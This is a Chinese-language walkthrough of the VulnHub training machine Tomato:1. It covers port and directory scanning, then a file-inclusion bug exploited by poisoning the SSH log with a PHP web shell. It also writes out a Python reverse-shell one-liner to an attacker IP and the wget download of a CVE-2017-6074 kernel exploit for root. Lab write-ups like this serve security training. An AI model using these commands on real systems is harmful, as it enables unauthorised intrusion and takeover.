VulnHub渗透测试实战靶场 - Tomato:1
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场 - Tomato:1相关的知识,希望对你有一定的参考价值。
环境下载
- 戳此进行环境下载
Tomato:1靶机搭建
将下载好的靶机导入Vmware,网络连接设置为NAT模式即可
渗透测试
信息搜集
- 用arp-scan探测一下网段内目标靶机的IP:
sudo arp-scan -l
- 得到目标靶机的IP为:
192.168.246.137
![](https://image.cha138.com/20210907/8ba741e7fac14fe5b76dd324d8662c7e.jpg)
- 使用
nmap
扫描开放的端口:sudo nmap -sC -sV -p 1-10000 192.168.246.137
,发现开放了21、80、2211、8888
四个端口
![](https://image.cha138.com/20210907/df81a597711b471cb1d116af025c88e6.jpg)
- 使用
dirb
扫描一下开放的80
端口:dirb http://192.168.246.137
![](https://image.cha138.com/20210907/425cb9b4965f494cbd34eed3ee4cf8e3.jpg)
漏洞挖掘
- 访问
http://192.168.246.137/antibot_image/
发现存在目录antibots
,接着访问该目录,发现存在很多文件
![](https://image.cha138.com/20210907/eddd9c103ac146b3937dd6cf48c4acb7.jpg)
- 访问
http://192.168.246.137/antibot_image/antibots/info.php
,找到phpinfo
的信息,F12查看源码发现 hint,存在文件包含漏洞
![](https://image.cha138.com/20210907/30d0a9f5397c4f70990cf59c80f05eaf.jpg)
getshell
- 前面信息搜集时发现开放了
2211
端口,服务为ssh
,尝试对日志文件写入 shell,然后包含日志文件- 先查看日志文件是不是在默认路径:
http://192.168.246.137/antibot_image/antibots/info.php?image=/var/log/auth.log
![](https://image.cha138.com/20210907/f3b631b92bb34ef48bac196cc6a42206.jpg)
- 利用
ssh
连接,写入一句话木马:ssh '<?php system($_GET['H3rmesk1t']);?>'@192.168.246.137 -p 2211
![](https://image.cha138.com/20210907/d5c1c508630946dd8666c4c82343538e.jpg)
- 查看靶机是否安装了 python,
whereis python
,可以看到目标靶机安装了python3,那就可以利用 python 进行反弹了
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.246.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- 执行命令
python3 -c 'import pty;pty.spawn("/bin/bash")'
将 shell 变为交互式的 shell
![](https://pic.imgdb.cn/item/611e58434907e2d39c5f1d74.png)
提权
- 执行命令
uname -a
查看 linux 内核版本,寻找有无可以利用的 exp,exp链接
![](https://image.cha138.com/20210907/7230b7981c7446868c065ae5ecad2769.jpg)
![](https://image.cha138.com/20210907/ed67275eb1e24d4b97e96b0ca143e9b6.jpg)
- 运行
compile.sh
编译c文件,然后在 kali 上用 Python 起一个 Http 服务,python2 -m SimpleHTTPServer 8888
,接着在靶机用用wget
命令wget http://192.168.246.129:8888/CVE-2017-6074
下载 exp
![](https://image.cha138.com/20210907/4b7818502c9e4b5987c83b932453a20d.jpg)
![](https://image.cha138.com/20210907/c693924b8c4d47db985f91fae5a86c18.jpg)
![](https://image.cha138.com/20210907/18ae9f2f4e9f413eae8bcfcf643058f7.jpg)
- 给 exp 赋予执行权限
chmod +x CVE-2017-6074
![](https://image.cha138.com/20210907/b85627a084a44a769a15543a857ab608.jpg)
- 运行 exp,拿到 root 权限
![](https://image.cha138.com/20210907/55448db85d2344728f8703d24b1f2ea9.jpg)
以上是关于VulnHub渗透测试实战靶场 - Tomato:1的主要内容,如果未能解决你的问题,请参考以下文章
VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker
VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1